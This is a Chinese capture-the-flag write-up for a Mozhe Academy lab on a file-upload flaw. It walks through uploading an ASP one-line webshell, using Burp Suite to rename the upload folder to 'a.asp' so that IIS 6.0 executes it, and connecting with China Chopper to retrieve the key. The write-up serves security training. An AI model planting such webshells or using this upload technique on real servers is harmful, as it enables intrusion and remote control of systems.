题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

1.解题方向
1、试探允许上传的文件类型
2、观察服务器在处理完上传任务后返回的内容,获取上传路径
3、尝试修改上传路径,观察服务器是否允许写入权限
4.PS:使用菜刀时可能出现连接不上靶机,可以尝试点击左上角,有个重置缓存,很有可能是因为上次使用菜刀留下的缓存冲突了

进入靶场。
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

测试可上传的文件,发现txt,jpg,png等格式都可以上传

上传php、asp等都不能上传

2.由于txt可上传,所以可以在txt中写入一句话木马
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)
文件上传到了一个asp文件中,所以可以考虑写入asp一句话
<%eval request(“a”)%>
3.开始操作
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

通过burpsuit抓包,修改upload为a.asp,可创建一个asp文件夹,然后放包通过。
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

文件成功传入a.asp文件夹,本题的关键就在这,为什么非得传入asp文件夹里,这是因为IIS的设计缺陷,只要上传的木马在ISS6.0环境中,并且存放在xxx.asp为名的文件夹下面,木马就被能执行

题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)
上传成功
上菜刀
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

拿到KEY。
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)